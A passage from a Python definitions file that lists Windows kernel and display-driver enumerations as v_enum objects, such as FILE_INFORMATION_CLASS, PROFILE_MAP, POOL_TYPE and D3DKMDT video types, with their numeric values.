FILE_INFORMATION_CLASS.FileIsRemoteDeviceInformation = 51
FILE_INFORMATION_CLASS.FileAttributeCacheInformation = 52
FILE_INFORMATION_CLASS.FileNumaNodeInformation = 53
FILE_INFORMATION_CLASS.FileStandardLinkInformation = 54
FILE_INFORMATION_CLASS.FileRemoteProtocolInformation = 55
FILE_INFORMATION_CLASS.FileMaximumInformation = 56
BUS_QUERY_ID_TYPE = v_enum()
BUS_QUERY_ID_TYPE.BusQueryDeviceID = 0
BUS_QUERY_ID_TYPE.BusQueryHardwareIDs = 1
BUS_QUERY_ID_TYPE.BusQueryCompatibleIDs = 2
BUS_QUERY_ID_TYPE.BusQueryInstanceID = 3
BUS_QUERY_ID_TYPE.BusQueryDeviceSerialNumber = 4
BUS_QUERY_ID_TYPE.BusQueryContainerID = 5
PROFILE_MAP = v_enum()
PROFILE_MAP.PMAP_COLORS = 0
PROFILE_MAP.PMAP_CURSORS = 1
PROFILE_MAP.PMAP_WINDOWSM = 2
PROFILE_MAP.PMAP_WINDOWSU = 3
PROFILE_MAP.PMAP_DESKTOP = 4
PROFILE_MAP.PMAP_ICONS = 5
PROFILE_MAP.PMAP_FONTS = 6
PROFILE_MAP.PMAP_TRUETYPE = 7
PROFILE_MAP.PMAP_KBDLAYOUT = 8
PROFILE_MAP.PMAP_INPUT = 9
PROFILE_MAP.PMAP_SUBSYSTEMS = 10
PROFILE_MAP.PMAP_BEEP = 11
PROFILE_MAP.PMAP_MOUSE = 12
PROFILE_MAP.PMAP_KEYBOARD = 13
PROFILE_MAP.PMAP_STICKYKEYS = 14
PROFILE_MAP.PMAP_KEYBOARDRESPONSE = 15
PROFILE_MAP.PMAP_MOUSEKEYS = 16
PROFILE_MAP.PMAP_TOGGLEKEYS = 17
PROFILE_MAP.PMAP_TIMEOUT = 18
PROFILE_MAP.PMAP_SOUNDSENTRY = 19
PROFILE_MAP.PMAP_SHOWSOUNDS = 20
PROFILE_MAP.PMAP_AEDEBUG = 21
PROFILE_MAP.PMAP_NETWORK = 22
PROFILE_MAP.PMAP_METRICS = 23
PROFILE_MAP.PMAP_UKBDLAYOUT = 24
PROFILE_MAP.PMAP_UKBDLAYOUTTOGGLE = 25
PROFILE_MAP.PMAP_WINLOGON = 26
PROFILE_MAP.PMAP_KEYBOARDPREF = 27
PROFILE_MAP.PMAP_SCREENREADER = 28
PROFILE_MAP.PMAP_HIGHCONTRAST = 29
PROFILE_MAP.PMAP_IMECOMPAT = 30
PROFILE_MAP.PMAP_IMM = 31
PROFILE_MAP.PMAP_POOLLIMITS = 32
PROFILE_MAP.PMAP_COMPAT32 = 33
PROFILE_MAP.PMAP_SETUPPROGRAMNAMES = 34
PROFILE_MAP.PMAP_INPUTMETHOD = 35
PROFILE_MAP.PMAP_MOUCLASS_PARAMS = 36
PROFILE_MAP.PMAP_KBDCLASS_PARAMS = 37
PROFILE_MAP.PMAP_COMPUTERNAME = 38
PROFILE_MAP.PMAP_TS = 39
PROFILE_MAP.PMAP_TABLETPC = 40
PROFILE_MAP.PMAP_MEDIACENTER = 41
PROFILE_MAP.PMAP_TS_EXCLUDE_DESKTOP_VERSION = 42
PROFILE_MAP.PMAP_WOW64_COMPAT32 = 43
PROFILE_MAP.PMAP_WOW64_IMECOMPAT = 44
PROFILE_MAP.PMAP_SERVERR2 = 45
PROFILE_MAP.PMAP_STARTER = 46
PROFILE_MAP.PMAP_ACCESS = 47
PROFILE_MAP.PMAP_AUDIODESCRIPTION = 48
PROFILE_MAP.PMAP_CONTROL = 49
PROFILE_MAP.PMAP_LAST = 49
NT_PRODUCT_TYPE = v_enum()
NT_PRODUCT_TYPE.NtProductWinNt = 1
NT_PRODUCT_TYPE.NtProductLanManNt = 2
NT_PRODUCT_TYPE.NtProductServer = 3
DMM_VIDPNCHANGE_TYPE = v_enum()
DMM_VIDPNCHANGE_TYPE.DMM_CVR_UNINITIALIZED = 0
DMM_VIDPNCHANGE_TYPE.DMM_CVR_UPDATEMODALITY = 1
DMM_VIDPNCHANGE_TYPE.DMM_CVR_ADDPATH = 2
DMM_VIDPNCHANGE_TYPE.DMM_CVR_ADDPATHS = 3
DMM_VIDPNCHANGE_TYPE.DMM_CVR_REMOVEPATH = 4
DMM_VIDPNCHANGE_TYPE.DMM_CVR_REMOVEALLPATHS = 5
DEVICE_POWER_STATE = v_enum()
DEVICE_POWER_STATE.PowerDeviceUnspecified = 0
DEVICE_POWER_STATE.PowerDeviceD0 = 1
DEVICE_POWER_STATE.PowerDeviceD1 = 2
DEVICE_POWER_STATE.PowerDeviceD2 = 3
DEVICE_POWER_STATE.PowerDeviceD3 = 4
DEVICE_POWER_STATE.PowerDeviceMaximum = 5
WHEA_ERROR_SOURCE_TYPE = v_enum()
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeMCE = 0
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeCMC = 1
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeCPE = 2
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeNMI = 3
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypePCIe = 4
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeGeneric = 5
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeINIT = 6
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeBOOT = 7
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeSCIGeneric = 8
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeIPFMCA = 9
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeIPFCMC = 10
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeIPFCPE = 11
WHEA_ERROR_SOURCE_TYPE.WheaErrSrcTypeMax = 12
DXGK_DIAG_CODE_POINT_TYPE = v_enum()
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_NONE = 0
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_RECOMMEND_FUNC_VIDPN = 1
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_OS_RECOMMENDED_VIDPN = 2
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_SDC_LOG_FAILURE = 3
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_SDC_INVALIDATE_ERROR = 4
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CDS_LOG_FAILURE = 5
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CDS_FAILURE_DB = 7
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_RETRIEVE_BTL = 8
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_RETRIEVE_DB = 9
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_QDC_LOG_FAILURE = 10
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_ON_GDI = 11
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_OFF_GDI = 12
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_ON_MONITOR = 13
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_OFF_MONITOR = 14
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_DIM_MONITOR = 15
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_POWER_UNDIM_MONITOR = 16
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_BACKTRACK = 17
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_CLOSEST_TARGET_MODE = 18
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_NO_EXACT_SOURCE_MODE = 19
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_NO_EXACT_TARGET_MODE = 20
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_SOURCE_MODE_NOT_PINNED = 21
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_TARGET_MODE_NOT_PINNED = 22
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_RESTARTED = 23
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_TDR = 24
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_ACPI_EVENT_NOTIFICATION = 25
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CREATEMDEV_USE_DEFAULT_MODE = 26
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CONNECTED_SET_LOG_FAILURE = 27
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_INVALIDATE_DXGK_MODE_CACHE = 28
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_REBUILD_DXGK_MODE_CACHE = 29
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CREATEFUNVIDPN_RELAX_REFRESH_MATCH = 30
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CREATEFUNVIDPN_CCDBML_FAIL_VISTABML_SUCCESSED = 31
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_BEST_SOURCE_MODE = 32
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_BML_BEST_TARGET_MODE = 33
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_ADD_DEVICE = 34
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_START_ADAPTER = 35
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_STOP_ADAPTER = 36
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CHILD_POLLING = 37
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CHILD_POLLING_TARGET = 38
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_INDICATE_CHILD_STATUS = 39
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_HANDLE_IRP = 40
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CHANGE_UNSUPPORTED_MONITOR_MODE_FLAG = 41
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_ACPI_NOTIFY_CALLBACK = 42
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_EXCLUDE_EVICTALL_DISABLEGDI = 43
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_EXCLUDE_EVICTALL_ENABLEGDI = 44
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_EXCLUDE_MODESWITCH = 45
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_SYNC_MONITOR_EVENT = 46
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_PNP_NOTIFY_GDI = 47
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_PNP_ENABLE_VGA = 48
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_TDR_SWITCH_GDI = 49
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_CREATE_DEVICE_FAILED = 50
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_DEVICE_REMOVED = 51
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_DRVASSERTMODE_TRUE_FAILED = 52
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_VIDEOPORTCALLOUT_CDD_RECREATE_DEVICE_FAILED = 53
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CDD_MAPSHADOWBUFFER_FAILED = 54
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_COMMIT_VIDPN_LOG_FAILURE = 55
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DRIVER_RECOMMEND_LOG_FAILURE = 56
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_SDC_ENFORCED_CLONE_PATH_INVALID_SOURCE_IDX = 57
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DRVPROBEANDCAPTURE_FAILED = 58
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DXGKCDDENABLE_OPTIMIZED_MODE_CHANGE = 59
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_DXGKSETDISPLAYMODE_OPTIMIZED_MODE_CHANGE = 60
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_MON_DEPART_GETRECENTTOP_FAIL = 61
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_MON_ARRIVE_INC_ADD_FAIL = 62
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CCD_DATABASE_PERSIST = 63
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_CCD_DATABASE_PERSIST_NO_CONNECTIVITY_HASH = 64
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_MAX = 64
DXGK_DIAG_CODE_POINT_TYPE.DXGK_DIAG_CODE_POINT_TYPE_FORCE_UINT32 = -1
DMM_VIDPN_MONITOR_TYPE = v_enum()
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_UNINITIALIZED = 0
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_PHYSICAL_MONITOR = 1
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_BOOT_PERSISTENT_MONITOR = 2
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_PERSISTENT_MONITOR = 3
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_TEMPORARY_MONITOR = 4
DMM_VIDPN_MONITOR_TYPE.DMM_VMT_SIMULATED_MONITOR = 5
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING = v_enum()
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_UNINITIALIZED = 0
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_PROGRESSIVE = 1
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_INTERLACED_UPPERFIELDFIRST = 2
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_INTERLACED_LOWERFIELDFIRST = 3
D3DDDI_VIDEO_SIGNAL_SCANLINE_ORDERING.D3DDDI_VSSLO_OTHER = 255
D3DKMDT_MONITOR_ORIENTATION = v_enum()
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_UNINITIALIZED = 0
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_0DEG = 1
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_90DEG = 2
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_180DEG = 3
D3DKMDT_MONITOR_ORIENTATION.D3DKMDT_MO_270DEG = 4
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY = v_enum()
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_UNINITIALIZED = -2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_OTHER = -1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_HD15 = 0
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SVIDEO = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_COMPOSITE_VIDEO = 2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_COMPONENT_VIDEO = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_DVI = 4
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_HDMI = 5
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_LVDS = 6
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_D_JPN = 8
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SDI = 9
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_DISPLAYPORT_EXTERNAL = 10
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_DISPLAYPORT_EMBEDDED = 11
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_UDI_EXTERNAL = 12
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_UDI_EMBEDDED = 13
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SDTVDONGLE = 14
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_INTERNAL = -2147483648
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SVIDEO_4PIN = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_SVIDEO_7PIN = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_RF = 2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_RCA_3COMPONENT = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY.D3DKMDT_VOT_BNC = 3
EVENT_TYPE = v_enum()
EVENT_TYPE.NotificationEvent = 0
EVENT_TYPE.SynchronizationEvent = 1
KSPIN_LOCK_QUEUE_NUMBER = v_enum()
KSPIN_LOCK_QUEUE_NUMBER.LockQueueUnusedSpare0 = 0
KSPIN_LOCK_QUEUE_NUMBER.LockQueueExpansionLock = 1
KSPIN_LOCK_QUEUE_NUMBER.LockQueueUnusedSpare2 = 2
KSPIN_LOCK_QUEUE_NUMBER.LockQueueSystemSpaceLock = 3
KSPIN_LOCK_QUEUE_NUMBER.LockQueueVacbLock = 4
KSPIN_LOCK_QUEUE_NUMBER.LockQueueMasterLock = 5
KSPIN_LOCK_QUEUE_NUMBER.LockQueueNonPagedPoolLock = 6
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoCancelLock = 7
KSPIN_LOCK_QUEUE_NUMBER.LockQueueWorkQueueLock = 8
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoVpbLock = 9
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoDatabaseLock = 10
KSPIN_LOCK_QUEUE_NUMBER.LockQueueIoCompletionLock = 11
KSPIN_LOCK_QUEUE_NUMBER.LockQueueNtfsStructLock = 12
KSPIN_LOCK_QUEUE_NUMBER.LockQueueAfdWorkQueueLock = 13
KSPIN_LOCK_QUEUE_NUMBER.LockQueueBcbLock = 14
KSPIN_LOCK_QUEUE_NUMBER.LockQueueMmNonPagedPoolLock = 15
KSPIN_LOCK_QUEUE_NUMBER.LockQueueUnusedSpare16 = 16
KSPIN_LOCK_QUEUE_NUMBER.LockQueueMaximumLock = 17
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_PRIMARY = 1
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_SECONDARY = 2
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_TERTIARY = 3
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_QUATERNARY = 4
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_QUINARY = 5
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_SENARY = 6
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_SEPTENARY = 7
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_OCTONARY = 8
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_NONARY = 9
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_DENARY = 10
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_MAX = 32
D3DKMDT_VIDPN_PRESENT_PATH_IMPORTANCE.D3DKMDT_VPPI_NOTSPECIFIED = 255
FSINFOCLASS = v_enum()
FSINFOCLASS.FileFsVolumeInformation = 1
FSINFOCLASS.FileFsLabelInformation = 2
FSINFOCLASS.FileFsSizeInformation = 3
FSINFOCLASS.FileFsDeviceInformation = 4
FSINFOCLASS.FileFsAttributeInformation = 5
FSINFOCLASS.FileFsControlInformation = 6
FSINFOCLASS.FileFsFullSizeInformation = 7
FSINFOCLASS.FileFsObjectIdInformation = 8
FSINFOCLASS.FileFsDriverPathInformation = 9
FSINFOCLASS.FileFsVolumeFlagsInformation = 10
FSINFOCLASS.FileFsMaximumInformation = 11
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE = v_enum()
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_RenderCommandBuffer = 0
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_DeferredCommandBuffer = 1
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_SystemCommandBuffer = 2
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_MmIoFlipCommandBuffer = 3
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_WaitCommandBuffer = 4
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_SignalCommandBuffer = 5
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_DeviceCommandBuffer = 6
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_SoftwareCommandBuffer = 7
D3DKMT_QUERYSTATISTICS_QUEUE_PACKET_TYPE.D3DKMT_QueuePacketTypeMax = 8
_unnamed_15459 = v_enum()
_unnamed_15459.DMM_DIAG_INFO_VISTA_BETA2_VERSION = 4097
_unnamed_15459.DMM_DIAG_INFO_VISTA_RC1_VERSION = 4098
_unnamed_15459.DMM_DIAG_INFO_VISTA_RTM_VERSION = 4099
_unnamed_15459.DMM_DIAG_INFO_WIN7_MQ_VERSION = 8192
_unnamed_15459.DMM_DIAG_INFO_WIN7_M3_VERSION = 8193
_unnamed_15459.DMM_DIAG_INFO_VERSION = 8193
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_GRAPHICS = 1
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_VIDEO = 2
D3DKMDT_VIDPN_PRESENT_PATH_CONTENT.D3DKMDT_VPPC_NOTSPECIFIED = 255
THRESHOLD_SELECTOR = v_enum()
THRESHOLD_SELECTOR.ThresholdMouse = 0
THRESHOLD_SELECTOR.ThresholdPen = 1
THRESHOLD_SELECTOR.ThresholdMouseDragOut = 2
THRESHOLD_SELECTOR.ThresholdPenDragOut = 3
THRESHOLD_SELECTOR.ThresholdMouseSideMove = 4
THRESHOLD_SELECTOR.ThresholdPenSideMove = 5
THRESHOLD_SELECTOR.ThresholdAlways = 6
THRESHOLD_SELECTOR.ThresholdLast = 7
POOL_TYPE = v_enum()
POOL_TYPE.NonPagedPool = 0
POOL_TYPE.PagedPool = 1
POOL_TYPE.NonPagedPoolMustSucceed = 2
POOL_TYPE.DontUseThisType = 3
POOL_TYPE.NonPagedPoolCacheAligned = 4
POOL_TYPE.PagedPoolCacheAligned = 5
POOL_TYPE.NonPagedPoolCacheAlignedMustS = 6
POOL_TYPE.MaxPoolType = 7
POOL_TYPE.NonPagedPoolSession = 32
POOL_TYPE.PagedPoolSession = 33
POOL_TYPE.NonPagedPoolMustSucceedSession = 34
POOL_TYPE.DontUseThisTypeSession = 35
POOL_TYPE.NonPagedPoolCacheAlignedSession = 36
POOL_TYPE.PagedPoolCacheAlignedSession = 37
POOL_TYPE.NonPagedPoolCacheAlignedMustSSession = 38
DMM_CLIENT_TYPE = v_enum()
DMM_CLIENT_TYPE.DMM_CT_UNINITIALIZED = 0
DMM_CLIENT_TYPE.DMM_CT_CDD_NOPATHDATA = 1
DMM_CLIENT_TYPE.DMM_CT_USERMODE = 2
DMM_CLIENT_TYPE.DMM_CT_CDD_PATHDATA = 3
DMM_CLIENT_TYPE.DMM_CT_DXGPORT = 4
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE = v_enum()
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_ClientRenderBuffer = 0
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_ClientPagingBuffer = 1
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_SystemPagingBuffer = 2
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_SystemPreemptionBuffer = 3
D3DKMT_QUERYSTATISTICS_DMA_PACKET_TYPE.D3DKMT_DmaPacketTypeMax = 4
D3DKMDT_VIDEO_SIGNAL_STANDARD = v_enum()
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_UNINITIALIZED = 0
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_VESA_DMT = 1
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_VESA_GTF = 2
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_VESA_CVT = 3
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_IBM = 4
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_APPLE = 5
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_NTSC_M = 6
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_NTSC_J = 7
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_NTSC_443 = 8
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_B = 9
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_B1 = 10
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_G = 11
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_H = 12
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_I = 13
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_D = 14
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_N = 15
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_NC = 16
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_B = 17
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_D = 18
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_G = 19
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_H = 20
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_K = 21
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_K1 = 22
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_L = 23
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_SECAM_L1 = 24
